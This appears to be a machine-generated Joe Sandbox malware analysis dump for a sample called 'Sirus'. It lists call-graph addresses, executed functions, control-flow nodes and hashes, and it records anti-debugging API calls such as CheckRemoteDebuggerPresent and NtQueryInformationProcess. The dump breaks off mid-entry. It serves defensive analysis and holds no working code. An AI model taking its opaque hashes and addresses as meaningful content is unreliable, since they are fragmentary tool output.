48401 539c7c3 48398->48401 48399->48401 48418 539aee0 48399->48418 48402 539aee0 4 API calls 48401->48402 48403 539c8fc 48401->48403 48402->48403 48403->48394 48405 5e1641c 48404->48405 48408 539c79c 4 API calls 48405->48408 48406 5e164b2 48508 5bfdd94 48406->48508 48513 5bff089 48406->48513 48407 5e164b9 48407->48394 48408->48406 48412 5e16429 48411->48412 48415 539c79c 4 API calls 48412->48415 48413 5e164b2 48416 5bff089 PostMessageW 48413->48416 48417 5bfdd94 PostMessageW 48413->48417 48414 5e164b9 48414->48394 48415->48413 48416->48414 48417->48414 48419 539aef0 48418->48419 48420 539af2d 48419->48420 48423 5e14e80 48419->48423 48442 5e14e70 48419->48442 48420->48401 48424 5e14e84 48423->48424 48425 5e14f57 48424->48425 48436 5396618 4 API calls 48424->48436 48437 5396600 4 API calls 48424->48437 48461 5e14774 48425->48461 48428 5e14fcd 48430 5e150ed 48428->48430 48481 5e147a4 48428->48481 48431 5e15094 48431->48430 48432 5e147a4 CreateWindowExW 48431->48432 48433 5e150bf 48432->48433 48433->48430 48434 5e147a4 CreateWindowExW 48433->48434 48435 5e150d0 48434->48435 48486 5e196e8 48435->48486 48491 5e196d8 48435->48491 48436->48425 48437->48425 48443 5e14e80 48442->48443 48446 5e14f57 48443->48446 48457 5396618 4 API calls 48443->48457 48458 5396600 4 API calls 48443->48458 48444 5e14774 CreateWindowExW 48445 5e14fc3 48444->48445 48447 5e14fcd 48445->48447 48454 5bff2d8 PostMessageW 48445->48454 48455 5bfde10 PostMessageW 48445->48455 48446->48444 48448 5e150ed 48447->48448 48449 5e147a4 CreateWindowExW 48447->48449 48456 5e15094 48449->48456 48450 5e147a4 CreateWindowExW 48451 5e150bf 48450->48451 48451->48448 48452 5e147a4 CreateWindowExW 48451->48452 48453 5e150d0 48452->48453 48459 5e196e8 SendMessageW 48453->48459 48460 5e196d8 SendMessageW 48453->48460 48454->48447 48455->48447 48456->48448 48456->48450 48457->48446 48458->48446 48459->48448 48460->48448 48463 5e1477f 48461->48463 48462 5e14fc3 48462->48428 48465 5bfde10 48462->48465 48473 5bff2d8 48462->48473 48463->48462 48464 5e147a4 CreateWindowExW 48463->48464 48464->48462 48466 5bfde1b 48465->48466 48468 5bff376 48466->48468 48496 5e18140 48466->48496 48500 5e1813f 48466->48500 48467 5bff417 48469 5e18140 PostMessageW 48467->48469 48470 5e1813f PostMessageW 48467->48470 48468->48428 48469->48468 48470->48468 48474 5bff2e4 48473->48474 48476 5bff376 48474->48476 48479 5e18140 PostMessageW 48474->48479 48480 5e1813f PostMessageW 48474->48480 48475 5bff417 48477 5e18140 PostMessageW 48475->48477 48478 5e1813f PostMessageW 48475->48478 48476->48428 48477->48476 48478->48476 48479->48475 48480->48475 48483 5e147af 48481->48483 48482 5e180c3 48482->48431 48483->48482 48484 53974f0 CreateWindowExW 48483->48484 48485 53974e2 CreateWindowExW 48483->48485 48484->48482 48485->48482 48488 5e196e9 48486->48488 48487 5e196f6 48487->48430 48488->48487 48489 5e197b7 SendMessageW 48488->48489 48490 5e197ed 48489->48490 48490->48430 48493 5e196e4 48491->48493 48492 5e196f6 48492->48430 48493->48492 48494 5e197b7 SendMessageW 48493->48494 48495 5e197ed 48494->48495 48495->48430 48497 5e18150 48496->48497 48504 5e1229c 48497->48504 48501 5e18150 48500->48501 48502 5e1229c PostMessageW 48501->48502 48503 5e18161 48502->48503 48503->48467 48505 5e18178 PostMessageW 48504->48505 48507 5e18161 48505->48507 48507->48467 48512 5bfdd9f 48508->48512 48509 5bfde10 PostMessageW 48511 5bff2d3 48509->48511 48510 5bff1f8 48510->48407 48511->48407 48512->48509 48512->48510 48514 5bff098 48513->48514 48515 5bfde10 PostMessageW 48514->48515 48516 5bff1f8 48514->48516 48517 5bff2d3 48515->48517 48516->48407 48517->48407 48324 25b0a68 48325 25b0a93 48324->48325 48329 25b2350 48325->48329 48335 25b3b88 48325->48335 48341 25b3a39 48325->48341 48330 25b235b 48329->48330 48331 25b2327 48329->48331 48346 25b23d8 48330->48346 48351 25b23c8 48330->48351 48331->48325 48332 25b2399 48332->48325 48336 25b3b46 48335->48336 48337 25b3b96 48335->48337 48364 25b60b1 48336->48364 48369 25b60c0 48336->48369 48338 25b3b5b 48338->48325 48343 25b3a6c 48341->48343 48342 25b3b35 48342->48325 48343->48342 48344 25b60b1 2 API calls 48343->48344 48345 25b60c0 2 API calls 48343->48345 48344->48342 48345->48342 48347 25b23fc 48346->48347 48348 25b2451 48347->48348 48356 25b1298 48347->48356 48360 25b1297 48347->48360 48348->48332 48352 25b23fc 48351->48352 48353 25b2451 48352->48353 48354 25b1298 CheckRemoteDebuggerPresent 48352->48354 48355 25b1297 CheckRemoteDebuggerPresent 48352->48355 48353->48332 48354->48353 48355->48353 48357 25b12dc CheckRemoteDebuggerPresent 48356->48357 48359 25b1344 48357->48359 48359->48348 48361 25b12dc CheckRemoteDebuggerPresent 48360->48361 48363 25b1344 48361->48363 48363->48348 48365 25b60e7 48364->48365 48366 25b6142 48365->48366 48374 25b21c0 48365->48374 48378 25b21b8 48365->48378 48366->48338 48370 25b60e7 48369->48370 48371 25b6142 48370->48371 48372 25b21b8 NtQueryInformationProcess 48370->48372 48373 25b21c0 NtQueryInformationProcess 48370->48373 48371->48338 48372->48371 48373->48371 48375 25b220c NtQueryInformationProcess 48374->48375 48377 25b2284 48375->48377 48377->48366 48379 25b21bd NtQueryInformationProcess 48378->48379 48381 25b2284 48379->48381 48381->48366 48518 25b5b88 48520 25b5b99 48518->48520 48519 25b5d2e 48520->48519 48525 25bb318 48520->48525 48530 25bb34f 48520->48530 48536 5e140d7 48520->48536 48540 5e140d8 48520->48540 48526 25bb271 48525->48526 48526->48525 48544 25bb418 48526->48544 48548 25bb428 48526->48548 48531 25bb32a 48530->48531 48533 25bb35f 48530->48533 48534 25bb418 CreateActCtxA 48531->48534 48535 25bb428 CreateActCtxA 48531->48535 48532 25bb347 48532->48520 48533->48520 48534->48532 48535->48532 48537 5e140ea 48536->48537 48556 5e11f74 48537->48556 48541 5e140ea 48540->48541 48542 5e11f74 PostMessageW 48541->48542 48543 5e1410a 48542->48543 48543->48520 48545 25bb428 48544->48545 48547 25bb52c 48545->48547 48552 25bb030 48545->48552 48550 25bb44f 48548->48550 48549 25bb52c 48550->48549 48551 25bb030 CreateActCtxA 48550->48551 48551->48549 48553 25bc4e0 CreateActCtxA 48552->48553 48555 25bc5e6 48553->48555 48555->48547 48557 5e11f7f 48556->48557 48559 5e1421b 48557->48559 48560 5e11fb4 48557->48560 48562 5e11fbf 48560->48562 48561 5e121fc PostMessageW 48565 5e14489 48561->48565 48564 5e1432e 48562->48564 48562->48565 48566 5e121fc 48562->48566 48564->48561 48564->48565 48565->48559 48567 5e12207 48566->48567 48571 5e14ae0 48567->48571 48575 5e14ac0 48567->48575 48568 5e146c4 48568->48564 48572 5e14b06 48571->48572 48573 5e14b1a 48572->48573 48574 5e1229c PostMessageW 48572->48574 48573->48568 48574->48573 48576 5e14ac5 48575->48576 48577 5e1229c PostMessageW 48576->48577 48578 5e14a87 48576->48578 48577->48578 48578->48568 48382 5e1a2d7 48383 5e1a2bb 48382->48383 48385 5e1a2db 48382->48385 48384 5e1a2e2 48385->48384 48386 5e1a3cf GetClassInfoW 48385->48386 48387 5e1a42a 48386->48387 48388 5e164d8 48389 5e164d9 SetWindowTextW 48388->48389 48391 5e16588 48389->48391 48616 5e16918 48617 5e16919 48616->48617 48619 5e157e8 3 API calls 48617->48619 48620 5e157d8 3 API calls 48617->48620 48618 5e169bc 48619->48618 48620->48618 48579 c7d01c 48580 c7d034 48579->48580 48581 c7d08e 48580->48581 48586 5395ee4 3 API calls 48580->48586 48587 5e180f0 48580->48587 48591 5399548 48580->48591 48600 5398718 48580->48600 48604 5398728 48580->48604 48586->48581 48590 5e180ef 48587->48590 48588 5e1817d PostMessageW 48589 5e18225 48588->48589 48589->48581 48590->48581 48590->48587 48590->48588 48593 5399558 48591->48593 48592 53995b9 48594 53995b7 48592->48594 48595 539600c 3 API calls 48592->48595 48593->48592 48596 53995a9 48593->48596 48595->48594 48597 53997ac 3 API calls 48596->48597 48598 53996e0 3 API calls 48596->48598 48599 53996d0 3 API calls 48596->48599 48597->48594 48598->48594 48599->48594 48601 5398728 48600->48601 48602 5395ee4 3 API calls 48601->48602 48603 539876f 48602->48603 48603->48581 48605 539874e 48604->48605 48606 5395ee4 3 API calls 48605->48606 48607 539876f 48606->48607 48607->48581 48608 53965e5 48609 53965f0 48608->48609 48610 5e1b728 2 API calls 48608->48610 48611 5e1b738 2 API calls 48608->48611 48610->48609 48611->48609 48621 5bfeb40 48622 5bfeb41 48621->48622 48626 5bfec2e 48622->48626 48627 5bfdd74 48622->48627 48624 5bfdd94 PostMessageW 48625 5bfede3 48624->48625 48626->48624 48629 5bfdd7f 48627->48629 48628 5bff00a 48628->48626 48629->48628 48630 5bfdd94 PostMessageW 48629->48630 48630->48628

                                                    Executed Functions

                                                    Function 05BF18C0 Relevance: 6.5, Strings: 5, Instructions: 296COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 856 5bf18c0-5bf18eb 857 5bf18ed 856->857 858 5bf18f2-5bf192e 856->858 857->858 861 5bf193f-5bf194d 858->861 862 5bf1930-5bf1936 861->862 862->861 863 5bf1938 862->863 863->861 864 5bf194f-5bf1953 863->864 865 5bf1a3d-5bf1a9f 863->865 866 5bf1976-5bf1a38 863->866 867 5bf1aa4-5bf1abc 863->867 868 5bf1abe-5bf1ace 864->868 869 5bf1959-5bf1974 864->869 865->862 866->862 870 5bf1ad0-5bf1ad4 867->870 868->870 869->862 873 5bf1b16-5bf1bbd 870->873 874 5bf1ad6-5bf1b13 870->874 892 5bf1bbf-5bf1bc8 873->892 893 5bf1bde 873->893 874->873 894 5bf1bcf-5bf1bd2 892->894 895 5bf1bca-5bf1bcd 892->895 896 5bf1be1-5bf1c2f 893->896 897 5bf1bdc 894->897 895->897 900 5bf1c38-5bf1cce 896->900 897->896 905 5bf1cef 900->905 906 5bf1cd0-5bf1cd9 900->906 909 5bf1cf2-5bf1cf8 905->909 907 5bf1cdb-5bf1cde 906->907 908 5bf1ce0-5bf1ce3 906->908 910 5bf1ced 907->910 908->910 910->909
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (y$d%dq$d%dq$$^q$$^q
                                                    • API String ID: 0-2238165116
                                                    • Opcode ID: 2a3413fdf579af746ccd63c1c7eda554dc9a975f8dccef2d7af24b0583174194
                                                    • Instruction ID: 6fd0f041a5abc2e275c57a81cb44d033a26fd562f69881738b68cb1a7fb8ccc9
                                                    • Opcode Fuzzy Hash: 2a3413fdf579af746ccd63c1c7eda554dc9a975f8dccef2d7af24b0583174194
                                                    • Instruction Fuzzy Hash: 3EC12874E00219DFDB14CFA9C880A9EBBF6BF89301F6085A9D519AB354DB34A956CF40
                                                    Function 05BF18B1 Relevance: 5.3, Strings: 4, Instructions: 284COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1093 5bf18b1-5bf18eb 1094 5bf18ed 1093->1094 1095 5bf18f2-5bf192e 1093->1095 1094->1095 1098 5bf193f-5bf194d 1095->1098 1099 5bf1930-5bf1936 1098->1099 1099->1098 1100 5bf1938 1099->1100 1100->1098 1101 5bf194f-5bf1953 1100->1101 1102 5bf1a3d-5bf1a9f 1100->1102 1103 5bf1976-5bf1a38 1100->1103 1104 5bf1aa4-5bf1abc 1100->1104 1105 5bf1abe-5bf1ace 1101->1105 1106 5bf1959-5bf1974 1101->1106 1102->1099 1103->1099 1107 5bf1ad0-5bf1ad4 1104->1107 1105->1107 1106->1099 1110 5bf1b16-5bf1bbd 1107->1110 1111 5bf1ad6-5bf1b13 1107->1111 1129 5bf1bbf-5bf1bc8 1110->1129 1130 5bf1bde 1110->1130 1111->1110 1131 5bf1bcf-5bf1bd2 1129->1131 1132 5bf1bca-5bf1bcd 1129->1132 1133 5bf1be1-5bf1c2f 1130->1133 1134 5bf1bdc 1131->1134 1132->1134 1137 5bf1c38-5bf1cce 1133->1137 1134->1133 1142 5bf1cef 1137->1142 1143 5bf1cd0-5bf1cd9 1137->1143 1146 5bf1cf2-5bf1cf8 1142->1146 1144 5bf1cdb-5bf1cde 1143->1144 1145 5bf1ce0-5bf1ce3 1143->1145 1147 5bf1ced 1144->1147 1145->1147 1147->1146
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (y$d%dq$d%dq$$^q
                                                    • API String ID: 0-3353541897
                                                    • Opcode ID: e5919fe7c3c9eee72897181387913a3876b4c2b18d5b617793d8bb944e5dc720
                                                    • Instruction ID: 8b41d2b19b6f175ac5a4d49f8a4373f5ad3140f5284966d85f4bbffc3a411230
                                                    • Opcode Fuzzy Hash: e5919fe7c3c9eee72897181387913a3876b4c2b18d5b617793d8bb944e5dc720
                                                    • Instruction Fuzzy Hash: 6CC12974E00218DFDB14CFA9C840A9EBBF6BF89301F6085A9D519EB355EB349956CF40
                                                    Function 025B21B8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 106nativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 025B2272
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1976305200.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_25b0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID: InformationProcessQuery
                                                    • String ID: U
                                                    • API String ID: 1778838933-3372436214
                                                    • Opcode ID: b11b4aa0ba9da0aab3da760ff6827d75b0bdf778a09fe1384b62a95a085ed90a
                                                    • Instruction ID: c1d20603ecb9d727d213b4365b7ae7792f0875abe8d9b3bf84483e26c6bab11c
                                                    • Opcode Fuzzy Hash: b11b4aa0ba9da0aab3da760ff6827d75b0bdf778a09fe1384b62a95a085ed90a
                                                    • Instruction Fuzzy Hash: D14199B8D002589FCF10CFA9D980ADEFBB1BF49310F10A42AE919B7250D735A945CF68
                                                    Function 025B21C0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 104nativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 025B2272
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1976305200.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_25b0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID: InformationProcessQuery
                                                    • String ID: U
                                                    • API String ID: 1778838933-3372436214
                                                    • Opcode ID: 76992bb4b84503d756f1642b80facb6b7d8f29fb745a43acb87fdef5dd3aba83
                                                    • Instruction ID: d6c10e10f34e7a56a4e7398d8137f1cb1bf507ca9124e6066eca8af477f57492
                                                    • Opcode Fuzzy Hash: 76992bb4b84503d756f1642b80facb6b7d8f29fb745a43acb87fdef5dd3aba83
                                                    • Instruction Fuzzy Hash: CF4178B8D042589FCF10CFA9D984ADEFBB1BF49310F10942AE819B7250D735A945CF69
                                                    Function 025B1298 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 95COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 025B1332
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1976305200.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_25b0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID: CheckDebuggerPresentRemote
                                                    • String ID: U
                                                    • API String ID: 3662101638-3372436214
                                                    • Opcode ID: c111b9d2975367f2f75b605d12a4d9ad729a6293a42757703451eb2a069a77da
                                                    • Instruction ID: 3d94b84b2773168f0ee634eda029b6e726965fb30d539928eb70cf17d7bd5cb1
                                                    • Opcode Fuzzy Hash: c111b9d2975367f2f75b605d12a4d9ad729a6293a42757703451eb2a069a77da
                                                    • Instruction Fuzzy Hash: 5741CDB5D052589FCB00CFA9D484AEEFBF4BF49310F24946AE459B7240D738AA45CF68
                                                    Function 025B1297 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 95COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 025B1332
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1976305200.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_25b0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID: CheckDebuggerPresentRemote
                                                    • String ID: U
                                                    • API String ID: 3662101638-3372436214
                                                    • Opcode ID: 52ef0beb78529dc12ab6c32aa5a66ff18406cb957578ca2135de74ca282874af
                                                    • Instruction ID: a9b2f80a66f05f55bd006195c1c9f879fcc83464a8982c371b7d13007c9c9635
                                                    • Opcode Fuzzy Hash: 52ef0beb78529dc12ab6c32aa5a66ff18406cb957578ca2135de74ca282874af
                                                    • Instruction Fuzzy Hash: 7941CDB5D052589FCB00CFA9D484AEEFBF0BF49310F24946AE459B7240D738AA45CF68
                                                    Function 025B7EB8 Relevance: .7, Instructions: 672COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1976305200.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_25b0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5343e066af29eccc48b095a3afaeb2e3bccb304c0617ae15287db76ad53636d0
                                                    • Instruction ID: fe47acf48706958dc86c3ce3389cfcc9072853a6712f9d6dccf32fe205878ba6
                                                    • Opcode Fuzzy Hash: 5343e066af29eccc48b095a3afaeb2e3bccb304c0617ae15287db76ad53636d0
                                                    • Instruction Fuzzy Hash: 746233B4901205CFE701DF98C68CAAABFBAFF05315F55E458E0086B656C779E888CF58
                                                    Function 025B5E10 Relevance: .1, Instructions: 93COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1976305200.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_25b0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 857f7e761c77466b223b25b3c34a1a3a3c61922c9ba9390f16f7dc77c0aaa432
                                                    • Instruction ID: f4e10ef54b8f6fbca1cfe9250a23c11547ef84b9c34ef38c37cbaff21bafbfa4
                                                    • Opcode Fuzzy Hash: 857f7e761c77466b223b25b3c34a1a3a3c61922c9ba9390f16f7dc77c0aaa432
                                                    • Instruction Fuzzy Hash: 4321B174C49208EBDB06DFA4D4847FEBBB9BF46304F50A594D00477241E7746A4ADF58
                                                    Function 025B5E20 Relevance: .1, Instructions: 81COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1976305200.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_25b0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 80a434924f547aef594573fc551599c8d6750d85a19cead4f2b11db327ab0bd0
                                                    • Instruction ID: 7ec82af6fd296a73b6a393474d3ecc2d0af0e7a9a22b3569e66f315387f9e54b
                                                    • Opcode Fuzzy Hash: 80a434924f547aef594573fc551599c8d6750d85a19cead4f2b11db327ab0bd0
                                                    • Instruction Fuzzy Hash: 7A214F74D4A208EAD706DFA4D4847FEB7B9AF46304F50A494D00973241EB745A49DF5C
                                                    Function 05BF6F08 Relevance: 6.6, Strings: 5, Instructions: 320COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 750 5bf6f08-5bf6f1f 752 5bf6f82-5bf6f90 750->752 753 5bf6f21-5bf6f30 750->753 756 5bf6fa3-5bf6fa5 752->756 757 5bf6f92-5bf6f9d call 5bf0ee4 752->757 753->752 758 5bf6f32-5bf6f3e call 5bf5ed8 753->758 852 5bf6fa7 call 5bf6f08 756->852 853 5bf6fa7 call 5bf6ec0 756->853 757->756 764 5bf7062-5bf70da 757->764 765 5bf6f52-5bf6f6e 758->765 766 5bf6f40-5bf6f4c call 5bf5ee8 758->766 763 5bf6fad-5bf6fbc 772 5bf6fbe-5bf6fcf call 5bf5ef8 763->772 773 5bf6fd4-5bf6fd7 763->773 792 5bf70dc-5bf70e2 764->792 793 5bf70e3-5bf70ed 764->793 778 5bf701d-5bf705b 765->778 779 5bf6f74-5bf6f78 765->779 766->765 774 5bf6fd8-5bf7016 766->774 772->773 774->778 778->764 779->752 798 5bf7329-5bf7355 793->798 799 5bf70f3-5bf710c call 5bf5f1c * 2 793->799 806 5bf735c-5bf73ad 798->806 799->806 807 5bf7112-5bf7134 799->807 814 5bf7136-5bf7144 call 5bf5ef8 807->814 815 5bf7145-5bf7154 807->815 820 5bf7179-5bf719a 815->820 821 5bf7156-5bf7173 815->821 828 5bf719c-5bf71ad 820->828 829 5bf71ea-5bf7212 820->829 821->820 832 5bf71af-5bf71c7 call 5bf5f2c 828->832 833 5bf71dc-5bf71e0 828->833 854 5bf7215 call 5bf75f0 829->854 855 5bf7215 call 5bf75e0 829->855 840 5bf71cc-5bf71da 832->840 841 5bf71c9-5bf71ca 832->841 833->829 836 5bf7218-5bf723d 843 5bf723f-5bf7254 836->843 844 5bf7283 836->844 840->832 840->833 841->840 843->844 847 5bf7256-5bf7279 843->847 844->798 847->844 851 5bf727b 847->851 851->844 852->763 853->763 854->836 855->836
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Hbq$Hbq$Hbq$Hbq$Hbq
                                                    • API String ID: 0-1677660839
                                                    • Opcode ID: ec3f7e382839754793cfca84b30243a9e391dc51b3e361f051e9160667611863
                                                    • Instruction ID: c301b9159cd3df26e7c323298e264956fbcdeffe58feea4af54f30e8007166a4
                                                    • Opcode Fuzzy Hash: ec3f7e382839754793cfca84b30243a9e391dc51b3e361f051e9160667611863
                                                    • Instruction Fuzzy Hash: B5B18B74B002048FDB18EBB9C4549AE77E2FFC9351B2444A9D906AB390DF35ED46CB61
                                                    Function 05BFB488 Relevance: 4.0, Strings: 3, Instructions: 231COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1201 5bfb488-5bfb4ea call 5bfa83c 1207 5bfb4ec-5bfb4ee 1201->1207 1208 5bfb550-5bfb57c 1201->1208 1209 5bfb4f4-5bfb500 1207->1209 1210 5bfb583-5bfb58b 1207->1210 1208->1210 1215 5bfb506-5bfb541 call 5bfa848 1209->1215 1216 5bfb592-5bfb6f8 1209->1216 1210->1216 1226 5bfb546-5bfb54f 1215->1226 1235 5bfb6fd-5bfb70b 1216->1235 1236 5bfb70d-5bfb713 1235->1236 1237 5bfb714-5bfb773 1235->1237 1236->1237 1242 5bfb775-5bfb778 1237->1242 1243 5bfb780 1237->1243 1242->1243 1244 5bfb781 1243->1244 1244->1244
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Hbq$Hbq$U
                                                    • API String ID: 0-221850694
                                                    • Opcode ID: b66d08ec4dcaccce99a4a63fedfdcfd63aecdf4c1d2cf59679371833b7cd3e00
                                                    • Instruction ID: 8d793a40624b6f24b11ec3182f99e41ff0b4c4bb0ec652de6e918fd82066a923
                                                    • Opcode Fuzzy Hash: b66d08ec4dcaccce99a4a63fedfdcfd63aecdf4c1d2cf59679371833b7cd3e00
                                                    • Instruction Fuzzy Hash: 62912874E003488FDB15DFA9C894AAEBBF6FF89300F24806AD519AB351DB34A945CF51
                                                    Function 05395E70 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 219COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1284 5395e70-5395eb6 1290 5395eb8-5398526 1284->1290 1291 5395f25 1284->1291 1296 5398528-539853a 1290->1296 1297 539853d-5398548 1290->1297 1293 5395f94-5395fd8 1291->1293 1294 5395f27 1291->1294 1296->1297 1298 539854a-5398559 1297->1298 1299 539855c-53985bc 1297->1299 1298->1299 1301 53985c4-5398664 CreateWindowExW 1299->1301 1302 539866d-53986d8 1301->1302 1303 5398666-539866c 1301->1303 1307 53986da-53986dd 1302->1307 1308 53986e5 1302->1308 1303->1302 1307->1308 1309 53986e6 1308->1309 1309->1309
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 05398651
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979107600.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5390000_Sirus.jbxd
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID: U
                                                    • API String ID: 716092398-3372436214
                                                    • Opcode ID: a3527d9f1c6b95cdda019c1e4bf6c3f53499153bd544823c21d6d0497494b1bb
                                                    • Instruction ID: 40ad5b37f0d15a034479ae8c8f9e97d5ed088cdd3d4d8f696520ac77a1a8a3f8
                                                    • Opcode Fuzzy Hash: a3527d9f1c6b95cdda019c1e4bf6c3f53499153bd544823c21d6d0497494b1bb
                                                    • Instruction Fuzzy Hash: 4B81EEB5D053689FDF11CFA9C884ACEBBF1BF4A304F14909AE458AB221D7349985CF45
                                                    Function 05398484 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 185COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1326 5398484-5398526 1329 5398528-539853a 1326->1329 1330 539853d-5398548 1326->1330 1329->1330 1331 539854a-5398559 1330->1331 1332 539855c-53985bc 1330->1332 1331->1332 1334 53985c4-5398664 CreateWindowExW 1332->1334 1335 539866d-53986d8 1334->1335 1336 5398666-539866c 1334->1336 1340 53986da-53986dd 1335->1340 1341 53986e5 1335->1341 1336->1335 1340->1341 1342 53986e6 1341->1342 1342->1342
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 05398651
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979107600.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5390000_Sirus.jbxd
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID: U
                                                    • API String ID: 716092398-3372436214
                                                    • Opcode ID: 9e131ceff1d53beba4d86c18fc659aea6d1f1a740b036d462cb58134e04fe36e
                                                    • Instruction ID: c5b99208cb700c64b2178f7b6832288b7f0a23b8b2769e91ee5d6f1717be6255
                                                    • Opcode Fuzzy Hash: 9e131ceff1d53beba4d86c18fc659aea6d1f1a740b036d462cb58134e04fe36e
                                                    • Instruction Fuzzy Hash: 7B719BB4D00218DFCF20CFA9C984BDEFBB1BB4A304F5091AAE518A7211D7709A85CF45
                                                    Function 05395EB8 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 185COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1310 5395eb8-5398526 1312 5398528-539853a 1310->1312 1313 539853d-5398548 1310->1313 1312->1313 1314 539854a-5398559 1313->1314 1315 539855c-5398664 CreateWindowExW 1313->1315 1314->1315 1318 539866d-53986d8 1315->1318 1319 5398666-539866c 1315->1319 1323 53986da-53986dd 1318->1323 1324 53986e5 1318->1324 1319->1318 1323->1324 1325 53986e6 1324->1325 1325->1325
                                                    APIs
